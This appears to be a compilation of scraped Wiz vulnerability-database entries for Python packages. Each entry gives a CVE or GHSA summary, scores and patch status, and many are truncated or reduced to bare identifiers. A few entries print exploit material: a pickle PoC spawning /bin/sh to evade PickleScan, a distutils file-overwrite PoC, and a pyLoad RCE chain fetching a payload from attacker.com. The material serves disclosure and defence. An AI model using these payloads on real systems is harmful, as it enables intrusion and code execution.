Wiz
CVE-2026-24130 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.7
CVE-2026-24130 [LOW] CVE-2026-24130 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24130 :
Python vulnerability analysis and mitigation
Moonraker is a Python web server providing API access to Klipper 3D printing firmware. In versions 0.9.3 and below, instances configured with the "ldap" component enabled are vulnerable to LDAP search filter injection techniques via the login endpoint. The 401 error response message can be used to determine whether or not a search was successful, allowing for brute force methods to discover LDAP entries on the server such as user IDs and user attributes. This issue has been fixed in version 0.10.0.
Source : NVD
## 2.7
Score
Published January 22, 2026
Severity LOW
CNA Score 2.7
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitatio
Wiz
CVE-2026-27628 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.2
CVE-2026-27628 [LOW] CVE-2026-27628 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27628 :
Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. Prior to 6.7.2, an attacker who uses this vulnerability can craft a PDF which leads to an infinite loop. This requires reading the file. This has been fixed in pypdf 6.7.2. As a workaround, one may apply the patch manually.
Source : NVD
## 1.2
Score
Published February 25, 2026
Severity LOW
CNA Score 1.2
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
open-webui
pypdf
Sources
NVD
Chainguard Has Fix Added at: Mar 02, 2026
Debian 11 Severity HIGH No Fix
Wiz
The CVE database: vulnerability intelligence curated by Wiz | Wiz
blogs_wiz·CVSS 9.8
[CRITICAL] The CVE database: vulnerability intelligence curated by Wiz | Wiz
## Wiz vulnerability database
A comprehensive resource for monitoring high-profile vulnerabilities in cloud environments, designed for security teams and cloud professionals
See how Wiz detects exploitable vulnerabilities across cloud workloads. Watch the 12-minute demo
## Browse by technology
## Popular filters
## High profile
| CVE ID | Severity | Score | Technologies | Component name | CISA KEV exploit | Has fix | Published date |
|---|---|---|---|---|---|---|---|
| CVE-2026-35616 | CRITICAL | 9.8 | FortiClient EMS | cpe:2.3:a:fortinet:forticlient_enterprise_management_server | Yes | Yes | Apr 04, 2026 |
| GHSA-69fq-xp46-6x23 | CRITICAL | 9.4 | N/A | github.com/aquasecurity/trivy | No | Yes | Mar 24, 2026 |
| CVE-2026-3055 | CRITICAL | 9.3 | Citrix ADC VPX | cpe:2.3:a:citrix:nets | | | |
Wiz
CVE-2026-32112 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-32112 [MEDIUM] CVE-2026-32112 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32112 :
Python vulnerability analysis and mitigation
ha-mcp is a Home Assistant MCP Server. Prior to 7.0.0, the ha-mcp OAuth consent form renders user-controlled parameters via Python f-strings with no HTML escaping. An attacker who can reach the OAuth endpoint and convince the server operator to follow a crafted authorization URL could execute JavaScript in the operator's browser. This affects only users running the beta OAuth mode (ha-mcp-oauth), which is not part of the standard setup and requires explicit configuration. This vulnerability is fixed in 7.0.0.
Source : NVD
## 4.7
Score
Published March 11, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
GHSA-hgrh-qx5j-jfwx Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-hgrh-qx5j-jfwx Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-hgrh-qx5j-jfwx :
Python vulnerability analysis and mitigation
## Summary
pty
pty.spawn
## Details
pty.spawn
## PoC
Run the following Python code to generate the PoC pickle file.
```python
import pickle

command = b"/bin/sh"
payload = b"".join(
    [
        pickle.PROTO + pickle.pack("B", 4),
        pickle.MARK,
        pickle.GLOBAL + b"pty\n" + b"spawn\n",
        pickle.EMPTY_LIST,
        pickle.SHORT_BINUNICODE + pickle.pack("B", len(command)) + command,
        pickle.APPEND,
        # Additional arguments can be passed by repeating the SHORT_BINUNICODE + APPEND opcodes
        pickle.OBJ,
        pickle.STOP,
    ]
)
with open("dump.pkl", "wb") as f:
    f.write(payload)
```
Run PickleScan on the generated pickle file.
pty.spawn
## Impact
pty.spawn
## Suggested Patch
diff --git a/src/picklescan/scanner.py b/src/picklescan/scanner.py
index 34a5715.
Wiz
CVE-2025-15506 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2025-15506 [MEDIUM] CVE-2025-15506 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-15506 :
Python vulnerability analysis and mitigation
A vulnerability was found in AcademySoftwareFoundation OpenColorIO up to 2.5.0. This issue affects the function ConvertToRegularExpression of the file src/OpenColorIO/FileRules.cpp. Performing a manipulation results in out-of-bounds read. The attack needs to be approached locally. The exploit has been made public and could be used. The patch is named ebdbb75123c9d5f4643e041314e2bc988a13f20d. To fix this issue, it is recommended to deploy a patch. The fix was added to the 2.5.1 milestone.
Source : NVD
## 4.8
Score
Published January 11, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Python
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Expl
Wiz
CVE-2025-45691 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-45691 [HIGH] CVE-2025-45691 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-45691 :
Python vulnerability analysis and mitigation
An Arbitrary File Read vulnerability exists in the ImageTextPromptValue class in Exploding Gradients RAGAS v0.2.3 to v0.2.14. The vulnerability stems from improper validation and sanitization of URLs supplied in the retrieved_contexts parameter when handling multimodal inputs.
Source : NVD
## 7.5
Score
Published March 5, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
ragas
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 08, 2026
Wiz
CVE-2026-21860 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2026-21860 [MEDIUM] CVE-2026-21860 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21860 :
Python vulnerability analysis and mitigation
Werkzeug is a comprehensive WSGI web application library. Prior to version 3.1.5, Werkzeug's safe_join function allows path segments with Windows device names that have file extensions or trailing spaces. On Windows, there are special device names such as CON, AUX, etc., that are implicitly present and readable in every directory. Windows still accepts them with any file extension, such as CON.txt, or with trailing spaces, such as "CON ". This issue has been patched in version 3.1.5.
Source : NVD
## 6.3
Score
Published January 8, 2026
Severity MEDIUM
CNA Score 6.3
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Per
Wiz
CVE-2026-27469 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-27469 [MEDIUM] CVE-2026-27469 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27469 :
Python vulnerability analysis and mitigation
Isso is a lightweight commenting server written in Python and JavaScript. In commits before 0afbfe0691ee237963e8fb0b2ee01c9e55ca2144, there is a stored Cross-Site Scripting (XSS) vulnerability affecting the website and author comment fields. The website field was HTML-escaped using quote=False, which left single and double quotes unescaped. Since the frontend inserts the website value directly into a single-quoted href attribute via string concatenation, a single quote in the URL breaks out of the attribute context, allowing injection of arbitrary event handlers (e.g. onmouseover, onclick). The same escaping is missing entirely from the user-facing comment edit endpoint (PUT /id/) and the moderation edit endpoint (POST /id/
Wiz
CVE-2026-23833 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.7
CVE-2026-23833 [LOW] CVE-2026-23833 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23833 :
Python vulnerability analysis and mitigation
ptr + field_length > end
components/api/proto.cpp
field_length
Source : NVD
## 1.7
Score
Published January 19, 2026
Severity LOW
CNA Score 1.7
Affected Technologies
Python
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 23.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
esphome
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Jan 21, 2026
Homebrew Severity HIGH Has Fix Added at: Mar 08, 2026
Nix Severity HIGH Has Fix Added at: Mar 08, 2026
Wiz
CVE-2026-22702 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.5
CVE-2026-22702 [MEDIUM] CVE-2026-22702 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22702 :
Python vulnerability analysis and mitigation
virtualenv is a tool for creating isolated virtual python environments. Prior to version 20.36.1, TOCTOU (Time-of-Check-Time-of-Use) vulnerabilities in virtualenv allow local attackers to perform symlink-based attacks on directory creation operations. An attacker with local access can exploit a race condition between directory existence checks and creation to redirect virtualenv's app_data and lock file operations to attacker-controlled locations. This issue has been patched in version 20.36.1.
Source : NVD
## 4.5
Score
Published January 10, 2026
Severity MEDIUM
CNA Score 4.5
Affected Technologies
Python
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Explo
Wiz
CVE-2026-35464 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-35464 [HIGH] CVE-2026-35464 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35464 :
Python vulnerability analysis and mitigation
## Summary
ADMIN_ONLY_OPTIONS
storage_folder
## Required Privileges
SETTINGS
storage_folder
ADD
## Root Cause
storage_folder
src/pyload/core/api/__init__.py:238-246
os.path.realpath
/tmp/pyLoad/flask/
SESSION_TYPE = "filesystem"
__init__.py:127
FileSystemCache
md5("session:" + session_id)
pickle.load()
## Proven RCE Chain
lscr.io/linuxserver/pyload-ng:latest
/tmp/pyLoad/flask/
realpath
/lsiopy/.../pyload/
/config/
md5(key_prefix + session_id)
session:
http://attacker.com/92912f771df217fb6fbfded6705dd47c
/tmp/pyLoad/flask/92912f771df217fb6fbfded6705dd47c
pyload_session_
__init__.py:128
pickle.load()
## Impact
A non-admin user with SETTINGS + ADD permissions achieves arbitrary code exec
Wiz
CVE-2026-25645 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.4
CVE-2026-25645 [MEDIUM] CVE-2026-25645 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25645 :
Python vulnerability analysis and mitigation
requests.utils.extract_zipped_paths()
extract_zipped_paths()
TMPDIR
Source : NVD
## 5.5
Score
Published March 25, 2026
Severity MEDIUM
CNA Score 4.4
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
checkov
python3.12-pip-wheel
Sources
NVD
Chainguard Has Fix Added at: Mar 26, 2026
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Mar 29, 2026
Echo Severity MEDIUM No Fix Added at: Mar 29, 2026
pip Severity MEDIUM Has Fix Added at: Mar 26, 2026
MinimOS Severity MEDIUM Has Fix Added at: Apr 05, 2026
Re
Wiz
GHSA-m273-6v24-x4m4 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-m273-6v24-x4m4 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-m273-6v24-x4m4 :
Python vulnerability analysis and mitigation
## Summary
Picklescan has open() and shutil in its default dangerous blocklist to prevent arbitrary file overwrites. However, the module distutils isn't blocked and can be used for the same purpose, i.e. to write arbitrary files.
## Details
This is another vulnerability which impacts the downstream user.
By constructing a pickle that uses distutils.file_util.write_file, an attacker can overwrite critical system files (like .ssh/authorized_keys, web server configurations, or source code) to achieve DoS or escalate to RCE.
## PoC
import pickle
import distutils.file_util
class FileWriteBypass:
def __reduce__(self):
target_file = "pwned_config.env"
content = ["print('I have overwritten your config')"]
return (di
Wiz
GHSA-vg9h-jx4v-cwx2 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-vg9h-jx4v-cwx2 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-vg9h-jx4v-cwx2 :
Python vulnerability analysis and mitigation
## Summary
debug = False
app.run(debug=...)
## Details
unfurl/app.py:web_app()
debug
config['UNFURL_APP'].get('debug')
UnfurlApp.__init__
app.run(debug=unfurl_debug, ...)
unfurl.ini
debug
"True"
As a result, debug mode is effectively always on and cannot be reliably disabled via config.
## PoC
unfurl.ini
debug = False
[UNFURL_APP]
unfurl_app
python -c 'from unfurl.app import web_app; web_app()'
Debug mode: on
Debugger is active!
security_poc/poc_debug_mode.py --spawn
## PoC Script (inline)
#!/usr/bin/env python3
"""
Unfurl Debug Mode PoC (Corrected)
This PoC demonstrates that Unfurl's Flask debug mode is effectively
**always enabled by default** due to string parsing of the `debug`
config
Wiz
GHSA-955r-262c-33jc Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-955r-262c-33jc Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-955r-262c-33jc :
Python vulnerability analysis and mitigation
## Summary
telnyx
## Exposure Window
4.87.1 (broken)
2026-03-27 03:51
2026-03-27 10:13
6h 22m
4.87.2 (functional)
2026-03-27 04:07
2026-03-27 10:13
6h 6m
Both versions were quarantined by PyPI at 2026-03-27 10:13 UTC. Note: Version 4.87.1 contained a typo that prevented the malware from executing. Only 4.87.2 was fully functional.
## Who Is Affected
You may be affected if:
telnyx
pip install telnyx
telnyx
You pinned to version 4.87.0 or earlier
You installed before March 27, 2026 and did not upgrade
You built from GitHub source (malicious code was never committed to the repository)
## Attack Details
## Root Cause
The attacker obtained the PyPI API token and uploaded malicious packages dire
Wiz
CVE-2026-27156 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-27156 [MEDIUM] CVE-2026-27156 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27156 :
Python vulnerability analysis and mitigation
Element.run_method()
AgGrid.run_grid_method()
EChart.run_chart_method()
eval()
runMethod()
Element.run_method()
Element.get_computed_prop()
json.dumps()
Source : NVD
## 6.1
Score
Published February 24, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
nicegui
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Feb 25, 2026
Wiz
CVE-2026-33231 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-33231 [HIGH] CVE-2026-33231 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33231 :
Python vulnerability analysis and mitigation
nltk.app.wordnet_app
GET /SHUTDOWN%20THE%20SERVER
os._exit(0)
Source : NVD
## 7.5
Score
Published March 20, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
open-webui
py3-nltk
Sources
NVD
Chainguard Has Fix Added at: Mar 26, 2026
Debian 11, 14 Severity HIGH No Fix Added at: Mar 21, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 21, 2026
Echo Severity HIGH No Fix Added at: Mar 21, 2026
pip Severity HIGH No Fix Added at: Mar 20, 2026
Wolfi Has Fix Added at: Mar
Wiz
CVE-2026-23877 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23877 [MEDIUM] CVE-2026-23877 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23877 :
Python vulnerability analysis and mitigation
list_folders()
/folder/dir-browser
Source : NVD
## 5.3
Score
Published January 19, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 21.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
swingmusic
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Jan 21, 2026
Wiz
CVE-2025-33253 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2025-33253 [HIGH] CVE-2025-33253 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-33253 :
Python vulnerability analysis and mitigation
NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution by convincing a user to load a maliciously crafted file. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.
Source : NVD
## 7.3
Score
Published February 18, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Python
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 29.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
nemo-toolkit
nemo
Sources
NVD
pip Severity HIGH Has Fix Added at: Feb 21, 2026
Nix Severit
Wiz
CVE-2026-33045 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.5
CVE-2026-33045 [HIGH] CVE-2026-33045 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33045 :
Python vulnerability analysis and mitigation
Home Assistant is open source home automation software that puts local control and privacy first. Starting in version 2025.02 and prior to version 2026.01, the "remaining charge time" sensor for mobile phones (imported/included from Android Auto, it appears) is vulnerable to cross-site scripting, similar to CVE-2025-62172. Version 2026.01 fixes the issue.
Source : NVD
## 7.3
Score
Published March 27, 2026
Severity HIGH
CNA Score 7.3
Affected Technologies
Python
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
home-assistant
homeassistant
Sou
Wiz
CVE-2026-30930 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-30930 [HIGH] CVE-2026-30930 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30930 :
Python vulnerability analysis and mitigation
Glances is an open-source cross-platform system monitoring tool. Prior to 4.5.1, the TimescaleDB export module constructs SQL queries using string concatenation with unsanitized system monitoring data. The normalize() method wraps string values in single quotes but does not escape embedded single quotes, making SQL injection trivial via attacker-controlled data such as process names, filesystem mount points, network interface names, or container names. This vulnerability is fixed in 4.5.1.
Source : NVD
## 8.6
Score
Published March 10, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation
Wiz
CVE-2026-24009 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-24009 [HIGH] CVE-2026-24009 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24009 :
Python vulnerability analysis and mitigation
docling_core.types.doc.DoclingDocument.load_from_yaml()
PyYAML
yaml.FullLoader
yaml.SafeLoader
Source : NVD
## 8.1
Score
Published January 22, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 36.3
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
docling-core
Sources
NVD
pip Severity HIGH Has Fix Added at: Jan 23, 2026
Wiz
CVE-2026-34934 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-34934 [CRITICAL] CVE-2026-34934 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34934 :
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to version 4.5.90, the get_all_user_threads function constructs raw SQL queries using f-strings with unescaped thread IDs fetched from the database. An attacker stores a malicious thread ID via update_thread. When the application loads the thread list, the injected payload executes and grants full database access. This issue has been patched in version 4.5.90.
Source : NVD
## 9.8
Score
Published April 3, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.7
Exploitation Probability (EPSS) N/A
Affected packages
Wiz
GHSA-2vhw-q7vh-7xv2 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-2vhw-q7vh-7xv2 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-2vhw-q7vh-7xv2 :
Python vulnerability analysis and mitigation
## Summary
/ready
openssl_encrypt_server/server.py
## Affected Code
```python
except Exception as e:
    return {"status": "not_ready", "reason": str(e)}
```
## Impact
Database exception messages can leak:
Database hostnames and IP addresses
Connection parameters and port numbers
Driver version information
Potentially database credentials if included in connection string errors
This information is available to unauthenticated callers.
## Recommended Fix
{"status": "not_ready", "reason": "database unavailable"}
Log the full exception server-side for debugging
## Fix
7aa8787
releases/1.4.x
Source : NVD
## 6.6
Score
Published April 1, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Python
Has Pub
Wiz
GHSA-9m86-7pmv-2852 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-9m86-7pmv-2852 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-9m86-7pmv-2852 :
Python vulnerability analysis and mitigation
## Impact
/ASCIIHexDecode
## Patches
This has been fixed in pypdf==6.7.5 .
## Workarounds
If you cannot upgrade yet, consider applying the changes from PR #3666 .
Source : NVD
## 6.9
Score
Published March 2, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pypdf
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Mar 03, 2026
Wiz
CVE-2026-2969 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-2969 [MEDIUM] CVE-2026-2969 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2969 :
Python vulnerability analysis and mitigation
A flaw has been found in datapizza-labs datapizza-ai 0.0.2. Affected is the function ChatPromptTemplate of the file datapizza-ai-core/datapizza/modules/prompt/prompt.py of the component Jinja2 Template Handler. This manipulation of the argument Prompt causes improper neutralization of special elements used in a template engine. Remote exploitation of the attack is possible. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 5.1
Score
Published February 23, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
E
Wiz
CVE-2026-33545 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33545 [MEDIUM] CVE-2026-33545 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33545 :
Python vulnerability analysis and mitigation
read_sqlite()
mobsf/MobSF/utils.py
%
sqlite_master
Source : NVD
## 6.5
Score
Published March 26, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mobsf
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Mar 25, 2026
Wiz
CVE-2026-39306 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.3
CVE-2026-39306 [HIGH] CVE-2026-39306 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39306 :
Python vulnerability analysis and mitigation
## Summary
.praison
tar.extractall()
../
## Details
The issue is caused by unsafe extraction of tar archive contents during recipe pull.
.praison
manifest.json
../../escape-http.txt
LocalRegistry.publish()
src/praisonai/praisonai/recipe/registry.py:214-287
manifest.json
LocalRegistry.pull()
src/praisonai/praisonai/recipe/registry.py:289-345
```python
recipe_dir = output_dir / name
recipe_dir.mkdir(parents=True, exist_ok=True)
with tarfile.open(bundle_path, "r:gz") as tar:
    tar.extractall(recipe_dir)
```
HttpRegistry.pull()
src/praisonai/praisonai/recipe/registry.py:691-739
```python
recipe_dir = output_dir / name
recipe_dir.mkdir(parents=True, exist_ok=True)
with tarfile.open(bundle_path, "r:gz") as tar:
    tar.extractall(recipe_di
```
Wiz
CVE-2026-33140 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33140 [MEDIUM] CVE-2026-33140 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33140 :
Python vulnerability analysis and mitigation
PySpector is a static analysis security testing (SAST) Framework engineered for modern Python development workflows. PySpector versions 0.1.6 and prior are affected by a stored Cross-Site Scripting (XSS) vulnerability in the HTML report generator. When PySpector scans a Python file containing JavaScript payloads (i.e. inside a string passed to eval() ), the flagged code snippet is interpolated into the HTML report without sanitization. Opening the generated report in a browser causes the embedded JavaScript to execute in the browser's local file context. This issue has been patched in version 0.1.7.
Source : NVD
## 5.3
Score
Published March 20, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has P
Wiz
CVE-2026-31815 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-31815 [MEDIUM] CVE-2026-31815 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31815 :
Python vulnerability analysis and mitigation
Unicorn adds modern reactive component functionality to your Django templates. Prior to 0.67.0, component state manipulation is possible in django-unicorn due to missing access control checks during property updates and method calls. An attacker can bypass the intended _is_public protection to modify internal attributes such as template_name or trigger protected methods. This vulnerability is fixed in 0.67.0.
Source : NVD
## 5.3
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.6
Exploitation Probability (EPSS) 0.1
Wiz
blogs_wiz·CVSS 5.3
CVE-2026-35052 [MEDIUM] CVE-2026-35052 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35052 : Python vulnerability analysis and mitigation
D-Tale is the combination of a Flask back-end and a React front-end to view & analyze Pandas data structures. Prior to 3.22.0, users hosting D-Tale publicly while using a redis or shelf storage layer could be vulnerable to remote code execution allowing attackers to run malicious code on the server. This vulnerability is fixed in 3.22.0.
Source : NVD
## 5.3
Score
Published April 6, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 63.5
Exploitation Probability (EPSS) 0.4
Affected packages and libraries
dtale
Sources
NVD
pip Severity MEDIUM Has Fix
Wiz
blogs_wiz·CVSS 7.5
CVE-2026-32609 [HIGH] CVE-2026-32609 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32609 : Python vulnerability analysis and mitigation
Identifiers quoted in the advisory: `/api/v4/config`, `as_dict_secure()`, `/api/v4/args`, `/api/v4/args/{item}`, `vars(self.args)`, `--password`.
Source : NVD
## 7.5
Score
Published March 18, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 35.5
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
glances
Sources
NVD
Alpine 3.10, 3.11, 3.12, 3.13, 3.14, 3.15, 3.16, 3.17, 3.18, 3.19, 3.20, 3.21, 3.22, 3.23, edge Severity HIGH No Fix Added at: Mar 20, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 19, 2026
Debian 14 Severity HIGH Has Fix Added at: Mar 19, 2026
Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-27jp-wm6q-gp25 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-27jp-wm6q-gp25 : Python vulnerability analysis and mitigation
## Summary
The below gist hangs while attempting to format a long list of tuples.
This was found while drafting a regression test for Django 5.2's composite primary key feature, which allows querying composite fields with tuples.
Source : NVD
## 6.9
Score
Published February 13, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
sqlparse
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Feb 15, 2026
Wiz
blogs_wiz·CVSS 9.8
